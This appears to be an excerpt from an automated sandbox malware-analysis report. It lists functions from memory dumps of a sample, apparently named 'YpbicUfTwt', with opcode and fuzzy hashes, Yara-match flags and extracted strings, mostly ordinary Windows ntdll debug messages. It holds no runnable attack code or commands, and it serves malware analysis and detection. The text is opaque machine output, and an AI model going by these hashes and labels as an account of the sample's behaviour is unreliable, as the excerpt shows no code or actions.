                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f72dd972a728c4ea87925d9e0df63d7f6e0c3bd900dbd27b01bde6961b76f16b
                                                                                  • Instruction ID: 2ff981903f2ef6e93ccb12f699329100900438d7444a9d23d8a44a80a5a714bf
                                                                                  • Opcode Fuzzy Hash: f72dd972a728c4ea87925d9e0df63d7f6e0c3bd900dbd27b01bde6961b76f16b
                                                                                  • Instruction Fuzzy Hash: 2290023120180412E60071588808747000587D1342F55C022A5168555F8A69C9927535
                                                                                  Function 00F82F90 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fc655ec1928d0d55f8520bf0be681f6e2737825165b3a0d441e57c8e004352cb
                                                                                  • Instruction ID: 27be60848499a7bf466cb164f62f2a73ed1d38a9ff9cc843d268372907a83c07
                                                                                  • Opcode Fuzzy Hash: fc655ec1928d0d55f8520bf0be681f6e2737825165b3a0d441e57c8e004352cb
                                                                                  • Instruction Fuzzy Hash: 0390023120180412E6007158881470B000587D1342F55C022A1168555E8A2989527575
                                                                                  Function 00F82F60 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a171304594cf87da5b07a4d1d27886ed6ddfb473589f53c61704211bdda39bf2
                                                                                  • Instruction ID: 12c248dfb51c108a5ecd25000eb3e2424a88cbaa8bd0324696a3155374ca541a
                                                                                  • Opcode Fuzzy Hash: a171304594cf87da5b07a4d1d27886ed6ddfb473589f53c61704211bdda39bf2
                                                                                  • Instruction Fuzzy Hash: D190026121140052E60471588404706004587E2341F55C023A2158554DC92D8D626129
                                                                                  Function 00F82F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a4068484046e8d7a948058d9d528f488713d8082b88cbb4d11d9b616d08cfa4a
                                                                                  • Instruction ID: caa31c3c7e4a47a6be6a6778f1f26d67c7269638d9a6bed7cdc96b283a4ac43b
                                                                                  • Opcode Fuzzy Hash: a4068484046e8d7a948058d9d528f488713d8082b88cbb4d11d9b616d08cfa4a
                                                                                  • Instruction Fuzzy Hash: F990026134140452E60071588414B060005C7E2341F55C026E1068554E8A1DCD53712A
                                                                                  Function 00F83090 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e8bd705576467f788708b5e8bc9fc2df0583b14dc9d550ca9fde6a9cb80d98f8
                                                                                  • Instruction ID: 48dca4134c71b0b537e29a92c0ec4bc38ecdab662d20ba628466b1e6d06f6487
                                                                                  • Opcode Fuzzy Hash: e8bd705576467f788708b5e8bc9fc2df0583b14dc9d550ca9fde6a9cb80d98f8
                                                                                  • Instruction Fuzzy Hash: A790022124140812E6407158C4147070006C7D1741F55C022A0028554E8A1A8A6676B5
                                                                                  Function 00F83010 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 908161fa1bf765324de8e115683899944696253cb90061d6fc0dea91f19a63b3
                                                                                  • Instruction ID: 51dd75316d44a9955205afcfb5c991337f2472395dfc4527096e85bb6d2ef05f
                                                                                  • Opcode Fuzzy Hash: 908161fa1bf765324de8e115683899944696253cb90061d6fc0dea91f19a63b3
                                                                                  • Instruction Fuzzy Hash: 7E90022120184452E64072588804B0F410587E2342F95C02AA415A554DCD1989566725
                                                                                  Function 00F839B0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e58d258b816884e1ca939ac94a3adb0427ca104085f8c42ecbc945b6a33f3885
                                                                                  • Instruction ID: 9a6885a1fd2ea282cb18f897240086c7c2cb01fe6aa4e0ed9eda1b9099cf438e
                                                                                  • Opcode Fuzzy Hash: e58d258b816884e1ca939ac94a3adb0427ca104085f8c42ecbc945b6a33f3885
                                                                                  • Instruction Fuzzy Hash: 5F90022124545112E650715C84046164005A7E1341F55C032A0818594E895989567225
                                                                                  Function 00F83D70 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2bcdc592d71d5028096a0a3a5836443e3b2e11291cd48ac973a6608800e58ea1
                                                                                  • Instruction ID: f0aa336df0f142df63d73ed93eae16addfee2759f4e7c326b08a7efb5cc612ad
                                                                                  • Opcode Fuzzy Hash: 2bcdc592d71d5028096a0a3a5836443e3b2e11291cd48ac973a6608800e58ea1
                                                                                  • Instruction Fuzzy Hash: 1A90023520140412EA1071589804646004687D1341F55D422A0428558E8A5889A2B125
                                                                                  Function 00F83D10 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 907bfdf5efde5e00eb7748f62eed914d6d3c857134f834ad7cf2fb804eb39f27
                                                                                  • Instruction ID: 71aa13fbd463bb3028e2254f75ee3d64b023748735735a0fac6d38e7218a9ffb
                                                                                  • Opcode Fuzzy Hash: 907bfdf5efde5e00eb7748f62eed914d6d3c857134f834ad7cf2fb804eb39f27
                                                                                  • Instruction Fuzzy Hash: D190023120240152AA4072589804A4E410587E2342B95D426A0019554DCD1889626225
                                                                                  Function 00F82C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction ID: 5857ab9bb1c272872b311a025d13eebebf94a0675d5f6af1f137923f8e1fe4e3
                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Function 00F82890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: 9e5700215f7fb4fbb63c440a8c9d31fb3098d3da0a3e857021f7aa7ee3615dd7
                                                                                  • Instruction ID: 0ac839b9178f735a858f5750f2e5966e4d1e038a1c8872456d4c7d60f48d01a7
                                                                                  • Opcode Fuzzy Hash: 9e5700215f7fb4fbb63c440a8c9d31fb3098d3da0a3e857021f7aa7ee3615dd7
                                                                                  • Instruction Fuzzy Hash: 2751FAB6E00116BFDF60EF9988806BEF7B8BB08310B148169E465D7641D734EF50BBA1
                                                                                  Function 00FF2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: 920fd44db904e17dbffd41d53bbb18f03a0b2806031b4319303480ab8c83d573
                                                                                  • Instruction ID: 479c74eda0a18db546384d7eeac1ce12caf0859c7d5b60684302ffd34c1d6e36
                                                                                  • Opcode Fuzzy Hash: 920fd44db904e17dbffd41d53bbb18f03a0b2806031b4319303480ab8c83d573
                                                                                  • Instruction Fuzzy Hash: 2A512671A00649AFCB70DF9CCC9097FB7F8EF44310B088459E695C3692EAB4DE00AB60
                                                                                  Function 00F77630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00FB46FC
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00FB4725
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00FB4742
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00FB4655
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 00FB4787
                                                                                  • ExecuteOptions, xrefs: 00FB46A0
                                                                                  • Execute=1, xrefs: 00FB4713
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  • Opcode ID: a3905a08bd52c5b2535025f44276322e25373d4b3f83391b3b095e1bde6f5ed1
                                                                                  • Instruction ID: a398b8c5c0db74dcad84b0ffc538ea3f47a68c79cdfd9781d5a54e907f524b5e
                                                                                  • Opcode Fuzzy Hash: a3905a08bd52c5b2535025f44276322e25373d4b3f83391b3b095e1bde6f5ed1
                                                                                  • Instruction Fuzzy Hash: DB513A31A143197ADF10BAA4EC86FED73A8EF14310F1440AAE509A7181EB75AE45EF52
                                                                                  Function 01016940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                  • Instruction ID: ebb7a05e70aa8ad21a893501795c1ac68093d707ca2dc0f62ec1fd4371f7f496
                                                                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                  • Instruction Fuzzy Hash: E2022571508341AFD345DF18C890A6BBBE5FFC8700F448A6DF9858B268DB7AE945CB42
                                                                                  Function 00F8B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-$0$0
                                                                                  • API String ID: 1302938615-699404926
                                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction ID: d902d8f3d58bdbe80343c5727dbe56f1ce6a32c90d7292c714adb5b3d6087e40
                                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction Fuzzy Hash: AA81E330E052499EDF24EF68C8917FEBBB5AF85330F18425AE861A72D1D7349C41EB50
                                                                                  Function 00FF20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$[$]:%u
                                                                                  • API String ID: 48624451-2819853543
                                                                                  • Opcode ID: 9af872a9c25d13fcbb8761612d2cc06efd6a54cd921a2b69cbb374bfb4ec7101
                                                                                  • Instruction ID: c04c9d1ce6a266c1c97543bc6956cb6c624eb46eafe547f7ab458103036792c1
                                                                                  • Opcode Fuzzy Hash: 9af872a9c25d13fcbb8761612d2cc06efd6a54cd921a2b69cbb374bfb4ec7101
                                                                                  • Instruction Fuzzy Hash: 34218EB6E0011DABDB50DE69CC41AFEBBE8AF54754F040126EA05E3251EB34DA01ABA5
                                                                                  Function 00F6F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00FB02E7
                                                                                  • RTL: Re-Waiting, xrefs: 00FB031E
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00FB02BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                  • API String ID: 0-2474120054
                                                                                  • Opcode ID: d73561c0decccfd23021b045da346fc9c3bd8cc97938db959cb56235198aac0a
                                                                                  • Instruction ID: d8fbed5575a5db16d8bbd821b96bc733c6c8255eb8bd304daabd3938aad7117e
                                                                                  • Opcode Fuzzy Hash: d73561c0decccfd23021b045da346fc9c3bd8cc97938db959cb56235198aac0a
                                                                                  • Instruction Fuzzy Hash: F1E1E131A047419FD724CF28D885B6AB7E0BF84324F240A6DF4A5CB2E1DB75D949EB42
                                                                                  Function 00F7BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RTL: Re-Waiting, xrefs: 00FB7BAC
                                                                                  • RTL: Resource at %p, xrefs: 00FB7B8E
                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00FB7B7F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 0-871070163
                                                                                  • Opcode ID: 114863093132ac1726ca9e8607fe5b3418641aeb796c246ea539615a1d3fa2be
                                                                                  • Instruction ID: 3d6773fb05553b6485d4cbcf68ca1fc219a04869d2752dbcce0723f4e00a6568
                                                                                  • Opcode Fuzzy Hash: 114863093132ac1726ca9e8607fe5b3418641aeb796c246ea539615a1d3fa2be
                                                                                  • Instruction Fuzzy Hash: 4C41E5317057029FC720DE25DC41BAAB7E5EF85720F104A1EF85ADB281DB31E905AF92
                                                                                  Function 00F7B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB728C
                                                                                  Strings
                                                                                  • RTL: Re-Waiting, xrefs: 00FB72C1
                                                                                  • RTL: Resource at %p, xrefs: 00FB72A3
                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00FB7294
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 885266447-605551621
                                                                                  • Opcode ID: 22bd92fc3c8eaa868eeef8bf1d21f2f6b3525c402e65d67b1231138edf2d13df
                                                                                  • Instruction ID: b8a23c1049469fde6adb77de265a705d9346610e654c90123ffee8459a0c8430
                                                                                  • Opcode Fuzzy Hash: 22bd92fc3c8eaa868eeef8bf1d21f2f6b3525c402e65d67b1231138edf2d13df
                                                                                  • Instruction Fuzzy Hash: 11410531B04312ABC720EE25CC42FA6B7A5FF95720F144619F859EB281DB31E846ABD1
                                                                                  Function 00FF2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$]:%u
                                                                                  • API String ID: 48624451-3050659472
                                                                                  • Opcode ID: 4c7386949c3efa3a893cab03ecc36378dd7bda801d845e86116b8957dbec71f2
                                                                                  • Instruction ID: 27e7d9ab7cf0154801fc211782ab89d71d4d64f38d822510601f1329393af763
                                                                                  • Opcode Fuzzy Hash: 4c7386949c3efa3a893cab03ecc36378dd7bda801d845e86116b8957dbec71f2
                                                                                  • Instruction Fuzzy Hash: 14318272A0061D9FDB60DE28CC41BFEB7B8EF44710F444556E949E3241EB34EA44ABA0
                                                                                  Function 00F87D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-
                                                                                  • API String ID: 1302938615-2137968064
                                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction ID: 1fb6bf95b9fb458ea6d30d3124fd390cb1c2b98b5dc566514368c1421ddd78ee
                                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction Fuzzy Hash: 7491A171E0831A9ADF24FE6AC8817FEB7A1AF44370F74451AE965A72C0DB30DD41A760
                                                                                  Function 00F49126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$@
                                                                                  • API String ID: 0-1194432280
                                                                                  • Opcode ID: e8b035115dc05aacc2258adaf0b888396525cbc274848e139041202396f33ae5
                                                                                  • Instruction ID: 29d6c1afd1346209c1cdc015f37ef4767f513cbc6311bc0c5427770e98433762
                                                                                  • Opcode Fuzzy Hash: e8b035115dc05aacc2258adaf0b888396525cbc274848e139041202396f33ae5
                                                                                  • Instruction Fuzzy Hash: 1F812D71E012699BDB35DB54CC45BEEB7B8AF48710F0441EAE909B7280D7745E84DFA0
                                                                                  Function 00FCCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00FCCFBD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallFilterFunc@8
                                                                                  • String ID: @$@4Qw@4Qw
                                                                                  • API String ID: 4062629308-2383119779
                                                                                  • Opcode ID: 232f84934b81fe59648976eebfbc0cc34439b24806f4a6dc8b4838b13d641f3f
                                                                                  • Instruction ID: 99ede4ccf924a1596f80de5cee8173d454a60c692db93c20d0b787f0c8cb0ae3
                                                                                  • Opcode Fuzzy Hash: 232f84934b81fe59648976eebfbc0cc34439b24806f4a6dc8b4838b13d641f3f
                                                                                  • Instruction Fuzzy Hash: 66419C71D00219DFCB21EFA9C942BADBBB8BF45B10F00402EE944DB255E639D905EB64

                                                                                  Executed Functions

                                                                                  Function 02F56C58 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 6$O$S$\$s
                                                                                  • API String ID: 0-3854637164
                                                                                  • Opcode ID: b65c54ee091a3920a7efdd9a6a12ef5e8b816e8b8adc51774cd369ed88908ef7
                                                                                  • Instruction ID: b1a4439229481266748a735fda07fda29b0c5a43dd34d95b0e6db50fe1e7f554
                                                                                  • Opcode Fuzzy Hash: b65c54ee091a3920a7efdd9a6a12ef5e8b816e8b8adc51774cd369ed88908ef7
                                                                                  • Instruction Fuzzy Hash: D151A1B2D00119ABDB10EB94DC88BFEB3B8EB44754F444699EF1DA7140E7719A488FE1
                                                                                  Function 02F652F8 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: j&vOnt$j&vOnt
                                                                                  • API String ID: 0-1288808581
                                                                                  • Opcode ID: a75ec2a5c1795c830c54f13267713fc780cea8d0a86751adc9d18d29384595ca
                                                                                  • Instruction ID: 2f2d9870ddcf06f89f36cd9d82cca6f00228c84550dfe53e4adfb1e521b8ab22
                                                                                  • Opcode Fuzzy Hash: a75ec2a5c1795c830c54f13267713fc780cea8d0a86751adc9d18d29384595ca
                                                                                  • Instruction Fuzzy Hash: DD11FEB6D01218AF8B00DFA9D8419EEB7F9EF48210F14466AE919E7200E7749A01CFE1
                                                                                  Function 02F48EAA Relevance: .5, Instructions: 467COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3f45361c2e17e7fdf1b3cc07fc613a8770eb85e698f480a00ce0ccf8617be211
                                                                                  • Instruction ID: 9c2e9717565751105d988ea4fb1d54b4c35400a74481eaf39a21a364fe00a806
                                                                                  • Opcode Fuzzy Hash: 3f45361c2e17e7fdf1b3cc07fc613a8770eb85e698f480a00ce0ccf8617be211
                                                                                  • Instruction Fuzzy Hash: B242C2B0E05268CFEB24CF54C994BDEBBB1BB45348F1085C9D24A7B281DBB55A89CF40
                                                                                  Function 02F424DA Relevance: .1, Instructions: 145COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5c35964d372a50b9dde2d211fb5afa782e8764cb993b6caed3ad866a4e9c239b
                                                                                  • Instruction ID: 8bd9825074d73081eb76dec396dcd88ecbb8c6c91a640887f3790825499db8a1
